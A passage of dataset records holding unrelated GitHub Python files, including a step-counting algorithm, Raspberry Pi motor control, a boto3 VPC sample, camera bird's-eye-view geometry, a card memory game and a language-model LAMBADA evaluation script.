self.app_blueprints.configure_blueprints(app, blueprints)\n","repo_name":"fc-thrisp-hurrata-dlm-graveyard/flails","sub_path":"flask_flails/flails.py","file_name":"flails.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"26504776424","text":"class Solution:\n def matrixMul(self, a, b):\n ans = [[0] * 3 for _ in range(3)]\n for i in range(3):\n for j in range(3):\n for k in range(3):\n ans[i][j] += a[i][k] * b[k][j]\n ans[i][j] %= 1000000007\n return ans\n\n def quickMul(self, matrix, x):\n ans = [[1, 0, 0], [0, 1, 0], [0, 0, 1]]\n while x:\n if x & 1:\n ans = self.matrixMul(ans, matrix)\n x >>= 1\n matrix = self.matrixMul(matrix, matrix)\n return ans\n\n def waysToStep(self, n: int) -> int:\n if n < 3:\n return n\n ans = self.quickMul([[0, 0, 1], [1, 0, 1], [0, 1, 1]], n - 2)\n return (ans[0][2] + ans[1][2] + ans[2][2] * 2) % 1000000007\n\n\nclass Solution_two:\n def waysToStep(self, n: int) -> int:\n if n <= 2:\n return n\n if n == 3:\n return 4\n f1, f2, f3 = 1, 2, 4\n mod = 10 ** 9 + 7\n for _ in range(n - 3):\n f1, f2, f3 = f2, f3, (f1 + f2 + f3) % mod\n\n return f3","repo_name":"ZainLiu/testproject","sub_path":"算法练习/202104/三步问题.py","file_name":"三步问题.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6511192714","text":"import time\nimport os\nimport serial\nimport sys\nimport RPi.GPIO as GPIO\nimport re\nimport time\n\nGPIO.setmode(GPIO.BCM)\nSTEPPER_PINS = [17,18,27,22]\nfor pin in STEPPER_PINS:\n GPIO.setup(pin,GPIO.OUT)\n GPIO.output(pin, GPIO.LOW)\n \nGPIO.setup(27, GPIO.OUT) \n\n\n\n\n\ny_STEPS= 0\nmotor_steps = 640\nbuf = 0\ncontR = 0\ncontL = 0\n\n\ncount = 0;\n\nwhile True:\n start=time.time()\n try:\n f = open('LRmotor_mode.txt','r+')\n modelswitch = int(f.readline())\n f.close()\n except:\n pass\n\n if modelswitch ==1:\n file='LRmotor_lora.txt'\n elif modelswitch ==2:\n file='ASM.txt'\n elif modelswitch ==3:\n file='LRmotor_always_left.txt'\n else:\n print(\"wrong\")\n\n\n f = open(file,'r+')\n data = f.readline()\n print(data)\n if data == \"\":\n pass\n else:\n # ~ datalist = data.split(',') #找尋,並分割資料\n datalist = data\n f.close()\n\n\n\n # ~ y_STEPS = ''.join([y_STEPS for y_STEPS in datalist[1] if y_STEPS.isdigit()]) #找尋數字\n y_STEPS = ''.join([y_STEPS for y_STEPS in datalist if y_STEPS.isdigit()]) #找尋數字 \n y_STEPS = int(y_STEPS)\n y_STEPS= y_STEPS*5\n #print(y_STEPS)\n\n\n \n if motor_steps < y_STEPS: # y_STEPS_CW右轉\n if contL == 1:\n time.sleep(0.001)\n for i in range(5):\n GPIO.output(17, 1) \n time.sleep(0.00008) \n GPIO.output(17, 0) \n time.sleep(0.00008)\n motor_steps += 1;\n contR = 1\n contL = 0\n \n \n if motor_steps > y_STEPS: # y_STEP_CCW左轉\n if contR == 1:\n time.sleep(0.001)\n for i in range(5):\n GPIO.output(27, 1) \n time.sleep(0.00008) \n GPIO.output(27, 0) \n time.sleep(0.00008)\n motor_steps -= 1;\n contL = 1\n contR = 0\n time.sleep(0.00001)\n end=time.time()\n FPS=round(1/(end-start),2)\n print('FPS:',FPS)\n\n \n \n\n","repo_name":"GeneChen1996/Beta-two-wheel-balance-car-wireless-control-system","sub_path":"LRmotor_read.py","file_name":"LRmotor_read.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41662947936","text":"'''\n====================\nBoto 3 - VPC Example\n====================\nThis application implements the VPC service that lets you gets\ninformation from Amazon VPC. See the README for more details.\n'''\nimport boto3\nimport json\n\nconfig = json.loads(open('config/defaults.json').read())\ncredentials = config['credentials']\n\nAWS_ACCESS_KEY_ID = credentials['aws_access_key_id']\nAWS_SECRET_ACCESS_KEY = credentials['aws_secret_access_key']\nREGION_NAME = 'us-west-1'\n\nvpc = boto3.client('vpc',\n aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n region_name=REGION_NAME)\n\n","repo_name":"rolandovillca/aws_samples_boto3_sdk","sub_path":"services/vpc/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2145874159","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 1 11:42:18 2020\n\n@author: gao\n\"\"\"\nimport numpy as np\nimport cv2\n\nclass DictObjHolder(object):\n def __init__(self, dct):\n self.dct = dct\n\n def __getattr__(self, name):\n return self.dct[name]\n \ndef rotX(a):\n a = np.deg2rad(a)\n R = np.array([[1,0,0],\n [0,np.cos(a),-np.sin(a)],\n [0,np.sin(a),np.cos(a)]])\n return R\n\ndef rotY(a):\n a = np.deg2rad(a)\n R = np.array([[np.cos(a),0,np.sin(a)],\n [0,1,0],\n [-np.sin(a),0,np.cos(a)]])\n return R\n\ndef rotZ(a):\n a = np.deg2rad(a)\n R = np.array([[np.cos(a),-np.sin(a),0],\n [np.sin(a),np.cos(a),0],\n [0,0,1]])\n return R \n\nclass BirdsEyeView:\n def __init__(self):\n self.scalex = [] # scale image W x-direction\n self.scaley = [] # scale image H y-direction\n self.vehicleHomography = []\n self.BirdsEyeViewTransform = []\n self.worldHW = []\n self.bevSize = []\n self.unwarp_matrix = []\n \n def birdseyeviewimage(self,image,IntrinsicMatrix,CameraPose,OutImgView,OutImgSize):\n Pitch = CameraPose.Pitch\n Yaw = CameraPose.Yaw\n Roll = CameraPose.Roll\n Height = CameraPose.Height\n \n distAheadOfSensor = OutImgView.distAheadOfSensor\n spaceToLeftSide = OutImgView.spaceToLeftSide \n spaceToRightSide = OutImgView.spaceToRightSide\n bottomOffset = OutImgView.bottomOffset\n \n outView = np.array([bottomOffset,distAheadOfSensor,-spaceToLeftSide,spaceToRightSide])\n reqImgHW = OutImgSize.copy()\n self.worldHW = np.abs([outView[1]-outView[0], outView[3]-outView[2]])\n \n rotation = np.linalg.multi_dot([rotY(180),rotZ(-90),rotZ(Yaw),rotX(90-Pitch),rotZ(Roll)])\n rotationMatrix = np.linalg.multi_dot([rotZ(Yaw),rotX(90-Pitch),rotZ(Roll)])\n sl = [0,0]\n translationInWorldUnits = [sl[1], sl[0], Height]\n translation = np.dot(translationInWorldUnits,rotationMatrix)\n camMatrix = np.dot(np.vstack([rotation,translation]),IntrinsicMatrix)\n tform2D = np.array([camMatrix[0,:], camMatrix[1,:], camMatrix[3,:]])\n ImageToVehicleTransform = np.linalg.inv(tform2D)\n self.vehicleHomography = ImageToVehicleTransform\n adjTform = np.array([[0, -1, 0],\n [-1, 0, 0],\n [0, 0, 1]])\n bevTform = np.dot(self.vehicleHomography,adjTform)\n \n nanIdxHW = np.isnan(reqImgHW)\n if ~nanIdxHW.any():\n scaleXY = np.flipud((reqImgHW-1)/self.worldHW)\n outSize = reqImgHW\n self.scalex = scaleXY[0]\n self.scaley = scaleXY[1]\n else:\n scale = (reqImgHW[~nanIdxHW]-1)/self.worldHW[~nanIdxHW]\n scaleXY = np.hstack([scale, scale])\n worldDim = self.worldHW[nanIdxHW]\n outDimFrac = scale*worldDim\n outDim = np.round(outDimFrac)+1\n outSize = reqImgHW\n outSize[nanIdxHW] = outDim\n self.scalex = scaleXY[0]\n self.scaley = scaleXY[1]\n OutputView = outView\n dYdXVehicle = np.array([OutputView[3], OutputView[1]])\n tXY = scaleXY*dYdXVehicle\n viewMatrix = np.array([[scaleXY[0], 0, 0],\n [0, scaleXY[1], 0],\n [tXY[0]+1, tXY[1]+1, 1]])\n self.BirdsEyeViewTransform = np.transpose(np.dot(bevTform, viewMatrix))\n self.bevSize = np.int_(np.flipud(outSize))\n birdsEyeViewImage = cv2.warpPerspective(image,self.BirdsEyeViewTransform,tuple(np.int_(np.flipud(outSize))))\n self.unwarp_matrix = np.linalg.inv(self.BirdsEyeViewTransform)/self.scalex\n return birdsEyeViewImage\n\n def imagetovehicle(self, imgpoint):\n # image pixel point (image coordination) to real world point position (vehicle coordination)\n \n worldpoint = np.dot(self.BirdsEyeViewTransform, np.hstack([imgpoint, 1]))\n worldpoint /= worldpoint[2]\n \n worldpoint_sc = worldpoint / np.array([self.scalex, self.scaley, 1])\n vehicle_Matrix = np.array([[0, -1, self.worldHW[0]],\n [-1, 0, self.worldHW[1]/2],\n [0, 0, 1]])\n worldpoint_vc = np.dot(vehicle_Matrix, worldpoint_sc)\n point_worldcoor = worldpoint_vc[0:2]\n point_bevcoor = np.int_(np.round(worldpoint[0:2]))\n return point_worldcoor, point_bevcoor\n \n def bevimagetovehicle(self, bevpoint):\n # image pixel point (image coordination) to real world point position (vehicle coordination)\n \n worldpoint = np.hstack([bevpoint, 1])\n \n worldpoint_sc = worldpoint / np.array([self.scalex, self.scaley, 1])\n vehicle_Matrix = np.array([[1, 0, -self.worldHW[1]/2],\n [0, 1, 0],\n [0, 0, 1]])\n worldpoint_vc = np.dot(vehicle_Matrix, worldpoint_sc)\n point_worldcoor = worldpoint_vc[0:2]\n return point_worldcoor\n \n def vehicletoimage(self, worldpoint_vc):\n # real world point (vehicle coordination) to image pixel point (image coordination) \n # and bird eye view image point (bev coordination)\n \n vehicle_Matrixinv = np.array([[0, -1, self.worldHW[1]/2],\n [-1, 0, self.worldHW[0]],\n [0, 0, 1]])\n worldpoint = np.dot(vehicle_Matrixinv, np.hstack([worldpoint_vc,1]))*np.array([self.scalex, self.scaley, 1])\n imgpoint = np.dot(np.linalg.inv(self.BirdsEyeViewTransform),worldpoint)\n imgpoint /= imgpoint[2]\n point_imgcoor = np.int_(np.round(imgpoint[0:2]))\n # point_bevcoor = np.int_(np.round(worldpoint[0:2]))\n return point_imgcoor\n \n \n\n","repo_name":"elmexx/eWolf_ROS2","sub_path":"lane_detection_package/lane_detection_package/utils/image2bev.py","file_name":"image2bev.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37859885121","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 16 22:02:08 2020\n\n@author: davidg\n\"\"\"\n\ndef prod(x):\n if hasattr(x, '__iter__'):\n y = x[0]\n if len(x) > 1:\n y *= prod(x[1:])\n else:\n y = x\n return y","repo_name":"DavidGrgic/Advent-of-Code","sub_path":"2020/mat.py","file_name":"mat.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72004387131","text":"''' Author: Zaeem Yousaf\nEmail: quaidzaeem@gmail.com\nDate: 01-02-2017\nversion: 1.0\npython: 3\nTeacher: Sir Naghman at PakTurk\n'''\n\n''' Function list\n\n1): mkCards(n,types) returns an array of size n, contains 'types' types of data\n2): mkGrid(cardsArray,rows,cols) returns two dimensional array of size 'rows' and 'columns'\n3): shuffle(grid,nplaces) returns shuffled two dimensional array, nplaces=1 means suffle only one card and so on\n4): areSame(usc) boolean predicates whether user selected card are same.\n5): cardsAtPos(grid,pos) returns cards array at positions\n6): gridDisplay(grid,faceUp=False,except) provides user's interface\n7): removeCards(grid,pos,replace) replaces cards at pos from grid with user defined value\n8): contains(boxArray,elements) boolean predicates whether 'element list' is in boxArray\n'''\ndef mkCards(n,types):\n ''' it makes n virtual cards of different types \n it is ordered list'''\n identicals=int(n/types)\n Deck=[]\n for t in range(types):\n for identical in range(identicals):\n Deck.append(t)\n return Deck\n\ndeck=mkCards(64,32)\n#--------------------------------------------\ndef mkGrid(cardsList,rows,cols):\n ''' makes two dimension grid into rows and columns '''\n grid=[]\n #loops=len(cardsList)+1\n loops=(rows*cols)+1\n rowElements=[]\n for l in range(1,loops):\n if l % cols !=0:\n rowElements.append(cardsList[l-1])\n else:\n rowElements.append(cardsList[l-1])\n grid.append(rowElements)\n rowElements=[]\n return grid\ngrid=mkGrid(deck,8,8)\n#print(grid) \n\n#----------------------------------------------\ndef shuffle(grid,nplaces):\n ''' it rearranges the cards \n nplaces tries to swap n cards to eachother's place'''\n shuffledGrid=grid\n # preserve the original grid\n m=len(grid)\n # number of rows\n n=len(grid[0])\n # number of columns\n from random import random\n for i in range(nplaces):\n # select one random coordinate\n rRow1=int((m)*random())\n #print(\" random row1 is: {} \".format(rRow1))\n # random row \n rCol1=int((n)*random())\n #print(\" random col1 is: {} \".format(rCol1))\n #print(rCol1)\n # random column\n vAtCoordinate1=(grid[rRow1])[rCol1]\n #print(\" value at {} is {} \".format((rRow1,rCol1),vAtCoordinate1))\n # value At Coodinate 1\n #-------------------------\n # select second random coordinate\n rRow2=int((m)*random())\n #print(\" random row2 is: {} \".format(rRow2))\n #print(rRow2)\n rCol2=int((n)*random())\n #print(\" random col2 is: {} \".format(rCol2))\n #print(rCol2)\n vAtCoordinate2=(grid[rRow2])[rCol2]\n #print(\" value at {} is {} \".format((rRow2,rCol2),vAtCoordinate2))\n #print(\" value at {}\".format(vAtCoordinate1))\n #------------------------- swaping\n temp=vAtCoordinate1\n vAtCoordinate1=vAtCoordinate2\n vAtCoordinate2=temp\n # print(\" after swaping value at {} is {} \".format((rRow2,rCol2),vAtCoordinate2))\n #------------------------- updating grid\n ((shuffledGrid[rRow2])[rCol2])=vAtCoordinate2\n ((shuffledGrid[rRow1])[rCol1])=vAtCoordinate1\n return shuffledGrid\nsGrid=shuffle(grid=grid,nplaces=20)\n#print(sGrid)\n\n#------------------------------------- test whether all are same\ndef areSame(usc):\n # User's Selected Cards\n ''' if first matchs all other then all are same '''\n first=usc[0]\n loops=len(usc)\n same=True\n for remaining in range(1,loops):\n if first != usc[remaining]:\n same=False\n if same == True:\n return True\n else:\n return False\n# print(areSame((1,1,1,1)))\n#----------------------------------\ndef contains(boxArray,elements):\n ''' boxArray: array from which you are comparing\n elements: array that you are comparing\n note: order matters\n '''\n # for exceptions only\n loops=int(len(boxArray)/2)\n found=False\n for first in range(loops):\n block=[]\n row=2*first\n for others in range(2):\n block.append(boxArray[row+others])\n #print(block)\n if block==elements:\n found=True\n if found==True:\n return True\n else:\n return False\n#print(contains(boxArray=[1,2,1,3,3,7],elements=[1,3]))\n#print(contains(boxArray=[1,2,1,3,3,7],elements=[3,2]))\n\n#----------------------------------\ndef cardsAtPos(grid,pos):\n ''' pos=(row1,col1,row2,col2....)\n starting index from 1\n each consective pair is position of a card grid'''\n # assumes first index =1\n cards=[]\n loops=int(len(pos)/2)\n for i in range(loops):\n i=i*2\n row=pos[i]\n card=(grid[row-1])[pos[i+1]-1]\n cards.append(card)\n return cards\n#print(cardsAtPos(grid,(1,1,8,8,0,5)))\n#--------------------------------------------\ndef gridDisplay(grid,faceUp=False,exception=[]):\n ''' Display grid\n either faces up are layed down\n except those cards at positions in except list '''\n\n # Top border\n print(\"__________ Game for Memory Testing Designed at PakTurk School _______________\\n\\n\")\n print(\"\",end=\"\\t\\t\")\n cloops=len(grid[0])\n rloops=len(grid)\n for cols in range(cloops):\n print(\"{}\".format(cols+1),end=\"\\t\")\n for rows in range(1,rloops+1):\n print(\"\\n\")\n print(\"\",end=\"\\t\")\n print(\"{}\".format(rows),end=\"\\t\")\n if faceUp==True:\n # lay cards with their faces up except a list give\n for columns in range(cloops):\n if (grid[rows-1])[columns] ==\"empty\":\n print(\" \",end=\"\\t\")\n # in case of empty\n #--------------------\n elif contains(boxArray=exception,elements=[rows,columns+1]) ==True:\n # in case of exception\n print(\"#\",end=\"\\t\")\n else:\n # show elements\n print(\"{}\".format((grid[rows-1])[columns]),end=\"\\t\")\n else:\n # lay cards with their faces down except a list given\n for columns in range(cloops):\n # in case, a card has been removed\n if (grid[rows-1])[columns] ==\"empty\":\n print(\" \",end=\"\\t\")\n elif contains(boxArray=exception,elements=[rows,columns+1]) ==True:\n print(\"{}\".format((grid[rows-1])[columns]),end=\"\\t\")\n # show card at this pos\n else:\n # mask with this sign\n print(\"#\",end=\"\\t\")\n \n print(\"\\n\")\n # return nothing if it runs successfully\n return 0\n#gridDisplay(grid,faceUp=False,exception=[1,1,1,2])\n#gridDisplay(sGrid,show=True)\n#-------------------------------------------- select cards at pos\n#usc=input(\"Enter cards pos coma separated: \")\n#pos=eval(usc)\n# users selected cards\n#cards=cardsAtPos(sGrid,pos)\n#if areSame(cards):\n# print(\"congratulation! your guess is right\")\n \n#print(cards)\n#---------------------------------------------\ndef removeCards(grid,pos,replace=\"empty\"):\n loops=int(len(pos)/2)\n for i in range(loops):\n i=i*2\n row=pos[i]\n (grid[row-1])[pos[i+1]-1]=replace\n#print(grid)\n#removeCards(grid,pos=[1,1,2,2])\n#print(grid)\n#=============================== user input functions\n\n","repo_name":"zaeemyousaf/zaeem","sub_path":"softDevelopement/memoryTest_1.0_python/MemoryTest_Functions.py","file_name":"MemoryTest_Functions.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"8945527037","text":"\"\"\"Run experiments mirroring Section 3.3 of GPT2 paper.\"\"\"\n\nimport argparse\nimport pandas as pd\nimport logging\nimport time\nimport functools\nimport collections\nimport pprint\nimport string\nimport re\nimport itertools\nimport tqdm\nimport pathlib\n\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\n\nimport relm\n\nSUPPORTED_MODELS = [\"gpt2\", \"gpt2-medium\", \"gpt2-large\", \"gpt2-xl\"]\n\n\ndef add_logger():\n \"\"\"Attach logging to the script.\"\"\"\n logger = relm.get_relm_logger()\n logger.setLevel(level=logging.DEBUG)\n # create file handler which logs even debug messages\n fh = logging.FileHandler('lambada.log')\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n ch = logging.StreamHandler()\n ch.setLevel(logging.WARNING)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n logger.addHandler(ch)\n return logger\n\n\ndef preprocess(text):\n \"\"\"GPT-2 dataset processing.\"\"\"\n text = text.replace(\"“\", '\"')\n text = text.replace(\"”\", '\"')\n text = text.replace(\"''\", '\"')\n text = text.replace(\"``\", '\"')\n text = text.replace(\"’\", \"'\")\n text = text.replace(\"‘\", \"'\")\n text = text.replace(\"–\", \"-\")\n text = text.replace(\" ,\", \",\")\n text = text.replace(\" .\", \".\")\n text = text.replace(\"é\", \"e\")\n text = text.replace(\"—\", \"-\")\n text = text.replace(\"\\xa0\", \" \")\n text = text.replace(\"\\u200a\", \"\")\n text = text.replace(\"…\", \"...\")\n text = text.replace(\"ñ\", \"n\")\n return '\\n'+text.strip()\n\n\ndef split_text(text):\n \"\"\"Split text by newline.\"\"\"\n xs = []\n ys = []\n for series in text:\n line_str = series.strip()\n words = line_str.split(\" \")\n x = \" \".join(words[:-1])\n y = words[-1]\n xs.append(x)\n ys.append(y)\n return xs, ys\n\n\ndef get_words():\n \"\"\"Return the list of words on Unix systems.\"\"\"\n with open(\"/usr/share/dict/words\") as f:\n words = f.read().splitlines()\n return words\n\n\ndef sanitize_query_str_rust(x: str) -> str:\n \"\"\"Remove special characters from query.\"\"\"\n return (x.replace(\".\", r\"\\.\")\n .replace(\"*\", r\"\\*\")\n .replace(\"+\", r\"\\+\")\n .replace(\"?\", r\"\\?\")\n .replace(\"[\", \"\\\\[\")\n .replace(\"]\", \"\\\\]\")\n .replace(\"{\", \"\\\\{\")\n .replace(\"}\", \"\\\\}\")\n .replace(\"(\", \"\\\\(\")\n .replace(\")\", \"\\\\)\")\n .replace(\"|\", \"\\\\|\")\n .replace(\"$\", \"\\\\$\")\n .replace(\"^\", \"\\\\^\")\n )\n\n\ndef read_data():\n \"\"\"Read and process lambada.\"\"\"\n f = \"../../lambada_test.jsonl\"\n if not pathlib.Path(f).exists():\n raise RuntimeError(\"Lambada dataset '{}' does not exist.\".format(f))\n df = pd.read_json(f, lines=True)\n df[\"processed\"] = df[\"text\"].map(preprocess)\n text = df['processed']\n x, y = split_text(text)\n df[\"x\"] = x\n df[\"y\"] = y\n return df\n\n\ndef get_parser():\n \"\"\"Return an argparse.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", type=str, choices=SUPPORTED_MODELS,\n default=\"gpt2\",\n help=\"The model to benchmark.\")\n parser.add_argument(\"--top_k\", type=int, default=None,\n help=\"The top_k for sampling.\")\n parser.add_argument(\"--static_minimize\", action=\"store_true\",\n help=\"Statically minimize automata using encoding.\")\n parser.add_argument(\"--add_eos_token\", action=\"store_true\",\n help=\"Force EOS.\")\n parser.add_argument(\"--remove_stop_words\", action=\"store_true\",\n help=\"Remove stop words.\")\n parser.add_argument(\"--force_context_words\", action=\"store_true\",\n help=\"Only use words in context.\")\n parser.add_argument(\"--max_results\", type=int, default=None,\n help=\"The number of results to run.\")\n return parser\n\n\n@functools.lru_cache(1)\ndef get_stop_words():\n \"\"\"Return a set of stop words.\"\"\"\n # Download stopwords data, just in case it's not downloaded\n import nltk\n nltk.download(\"stopwords\")\n\n from nltk.corpus import stopwords\n stop_words = set(stopwords.words('english'))\n return stop_words\n\n\ndef run_query(model, tokenizer, query, max_samples, remove_stop_words):\n \"\"\"Run a query with the model.\"\"\"\n test_relm = relm.model_wrapper.TestableModel(model, tokenizer)\n print(\"Building query.\")\n if remove_stop_words:\n stop_words = get_stop_words()\n print(\"stop_words\", stop_words)\n print(\"him\" in stop_words)\n stop_words_str = \"|\".join(\"({})\".format(s) for s in stop_words)\n prefix = query.accept_str\n puncs = [\".\", \"!\", \"?\"]\n punctuation_str = [\"({})\".format(sanitize_query_str_rust(x)) for x in\n puncs]\n punctuation_str = \"({})\".format(\"|\".join(punctuation_str))\n suffix = punctuation_str\n filter_str = \"{} ({})({})?(\\\")?\".format(\n prefix, stop_words_str, suffix)\n print(\"Filter str: {}\".format(filter_str))\n query.experimental_filter_str = filter_str\n ret = relm.search(model, tokenizer, query)\n ret = map(lambda x: (x, time.perf_counter()), ret)\n print(\"Executing query.\")\n start_time = time.perf_counter()\n xs = []\n ts = []\n urls = []\n for x, t in ret:\n url = test_relm.tokens_to_words(x)\n if remove_stop_words:\n stop_words = get_stop_words()\n last_word = sentence_to_pred(url)\n print(\"url: {}\".format(url))\n print(\"Last word: {}\".format(last_word))\n if last_word in stop_words:\n raise RuntimeError(\"Found stop word: {}\".format(last_word))\n xs.append([int(xx) for xx in x])\n ts.append(t - start_time)\n urls.append(url)\n if max_samples and len(xs) >= max_samples:\n break\n print(\"tokens\", xs)\n print(\"urls\", urls)\n print(\"times\", ts)\n results = {\"urls\": urls,\n \"times\": ts,\n \"tokens\": xs,\n }\n token_counter = collections.Counter(map(tuple, xs))\n common_tokens = list(token_counter.most_common(100))\n print(\"Common tokens: {}\".format(\n pprint.pformat(common_tokens)))\n total = len(xs)\n common_probs = [(x, cnt / total) for x, cnt in common_tokens]\n print(\"Common tokens probs: {}\".format(\n pprint.pformat(common_probs)))\n return results\n\n\ndef sentence_to_pred(sentence):\n \"\"\"Convert a sentence into a predicted word string without punctuation.\"\"\"\n pred = sentence.split(\" \")[-1].translate(\n str.maketrans('', '', string.punctuation))\n return pred\n\n\ndef main():\n \"\"\"Run the main function.\"\"\"\n logger = add_logger()\n parser = get_parser()\n args = parser.parse_args()\n print(\"Args: {}\".format(dict(vars(args))))\n df = read_data()\n\n model_id = args.model\n tokenizer = AutoTokenizer.from_pretrained(model_id)\n model = AutoModelForCausalLM.from_pretrained(\n model_id, return_dict_in_generate=True,\n pad_token_id=tokenizer.eos_token_id)\n model.eval()\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n model = model.to(device, non_blocking=True)\n\n top_k = args.top_k\n max_samples = 1\n\n sample_iter = zip(df[\"x\"], df[\"y\"])\n all_results = []\n all_attempts_results = []\n\n ignore_set = {182, }\n\n if args.max_results:\n sample_iter = itertools.islice(sample_iter, args.max_results)\n sample_iter = list(sample_iter)\n sample_iter = tqdm.tqdm(sample_iter)\n\n for i, (x, y) in enumerate(sample_iter):\n logger.info(\"Starting processing sample {}: {} {}\".format(i, x, y))\n if i in ignore_set:\n continue\n if args.max_results and i >= args.max_results:\n break\n print(i)\n prefixes = [x]\n queries = [\" \".join([x, y])]\n puncs = [\".\", \"!\", \"?\"]\n punctuation_str = [\"({})\".format(sanitize_query_str_rust(x)) for x in\n puncs]\n punctuation_str = \"({})\".format(\"|\".join(punctuation_str))\n if args.force_context_words:\n words_used = set(re.findall(r'[\\w]+', x))\n words_used_str = \"({})\".format(\n \"|\".join(\"({})\".format(w) for w in words_used))\n word_str = \" ({})({})?(\\\")?\".format(words_used_str,\n punctuation_str)\n else:\n word_str = \" ([a-zA-Z]+)({})?(\\\")?\".format(punctuation_str)\n sanitized_test_strings = sanitize_query_str_rust(x) + word_str\n sanitized_test_strings = [sanitized_test_strings]\n # All but last word\n sanitized_prefix_strings = map(\n lambda x: \"({})\".format(\n sanitize_query_str_rust(x)\n ),\n prefixes,\n )\n sanitized_test_string = \"|\".join(sanitized_test_strings)\n sanitized_prefix_string = \"|\".join(sanitized_prefix_strings)\n print(\"query\", sanitized_test_string)\n print(\"prefix\", sanitized_prefix_string)\n query = relm.SearchQuery(sanitized_test_string)\n query.accept_str = sanitized_prefix_string\n query.num_samples = None\n query.backend = relm.SearchBackendType.AUTOMATA\n query.top_k_sampling = top_k\n query.sequence_length = 256\n query.experimental_advanced_parsing = True\n query.experimental_advanced_parsing_simplify = True\n query.experimental_advanced_parsing_static_minimize = \\\n args.static_minimize\n query.experimental_advanced_parsing_static_minimize_prefix_only = True\n query.experimental_regex_backend = \\\n relm.facade.RegexBackendType.RUST\n query.experimental_dijkstra = True\n query.experimental_dijkstra_beam_size = None\n query.experimental_penalized_accepted_probability = False\n query.experimental_avoid_not_accepted_probability = True\n query.experimental_fast_start = True\n query.experimental_very_fast_start = True\n query.experimental_add_eos_token = args.add_eos_token\n remove_stop_words = args.remove_stop_words\n start_time = time.perf_counter()\n start_time_s = time.time()\n msg = \"\"\n try:\n results = run_query(model, tokenizer, query, max_samples,\n remove_stop_words)\n except Exception as ex:\n # TODO(mkuchnik): Add handling\n print(ex)\n results = {\"urls\": [],\n \"times\": [],\n \"tokens\": [],\n }\n msg = str(ex)\n print(results)\n pred = sentence_to_pred(results[\"urls\"][0])\n acc = pred == y\n print(\"Predicted {} vs {} ({})\".format(pred, y, acc))\n end_time = time.perf_counter()\n end_time_s = time.time()\n elapsed_time = end_time - start_time\n print(\"Finished in {} seconds\".format(elapsed_time))\n df = pd.DataFrame(results)\n attempt_results = {\n \"realtime_start_time_s\": start_time_s,\n \"realtime_end_time_s\": end_time_s,\n \"start_time\": start_time,\n \"end_time\": end_time,\n \"num_results\": len(df),\n \"prefix\": prefixes[0],\n \"query\": queries[0],\n \"message\": msg,\n \"prediction\": pred,\n \"x\": x,\n \"y\": y,\n }\n # Unpack\n df[\"prefixes\"] = prefixes[0]\n df[\"query\"] = queries[0]\n attempt_df = pd.Series(attempt_results).to_frame()\n all_results.append(df)\n all_attempts_results.append(attempt_df)\n all_results_df = pd.concat(all_results)\n all_attempts_results_df = pd.concat(all_attempts_results)\n all_results = [all_results_df]\n all_attempts_results = [all_attempts_results_df]\n all_results_df.to_csv(\"results.csv\")\n all_attempts_results_df.to_csv(\"attempts_results.csv\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mkuchnik/relm","sub_path":"experiments/language_understanding/run_eval.py","file_name":"run_eval.py","file_ext":"py","file_size_in_byte":12161,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"78"} +{"seq_id":"27988879076","text":"import os\nimport json\n\n\ndef file2dict(file):\n res = dict()\n with open(file) as f:\n lines = f.readlines()\n for l in lines:\n l = l.strip()\n name = l.split(':')[0]\n value = l.split(':')[1]\n if name not in res.keys():\n res[name] = []\n for v in value.split(','):\n res[name].append(v)\n return res\n\n\ndef get_method_line(file):\n line_list = []\n line_num = 0\n with open(file, 'r+', encoding=\"utf-8\") as f:\n all_lines = f.readlines()\n for line in all_lines:\n line_num += 1\n line = line.strip()\n if 'def ' == line[:4]:\n line_list.append(line_num)\n continue\n return line_list\n\n\ndef get_all_method_line(base_dir):\n all_fun = 0\n method_line = dict()\n for dir_path, dir_name, files in os.walk(base_dir):\n for file in files:\n if not file.endswith('.py'):\n continue\n if '__init__.py' in file:\n continue\n file_path = os.path.join(dir_path, file)\n temp_list = get_method_line(file_path)\n all_fun += len(temp_list)\n if temp_list and len(temp_list) > 0:\n method_line[file_path] = temp_list\n print(base_dir)\n print(\"debug___: all python method line is \", all_fun)\n return method_line\n\n\ndef json2dict(file, granularity='line'):\n res = dict()\n # if granularity == 'line' or granularity == 'file':\n with open(file, 'r') as f:\n json_dict = json.load(f)\n json_dict = json_dict['files']\n for file_name in json_dict.keys():\n if '__init__.py' in file_name:\n continue\n temp = json_dict[file_name]['executed_lines']\n cov_lines_num = json_dict[file_name][\"summary\"][\"covered_lines\"]\n # executed line not equeal to covered line\n # assert int(cov_lines_num) == len(temp),\n # f'true number is {len(temp)}, while the report say it is {cov_lines_num}; file name is:{file_name}'\n # if file_name.startswith('/workplace/software/mxnet/'):\n # file_name = '/workplace/software/mxnet2/' + file_name[len('/workplace/software/mxnet/'):]\n if 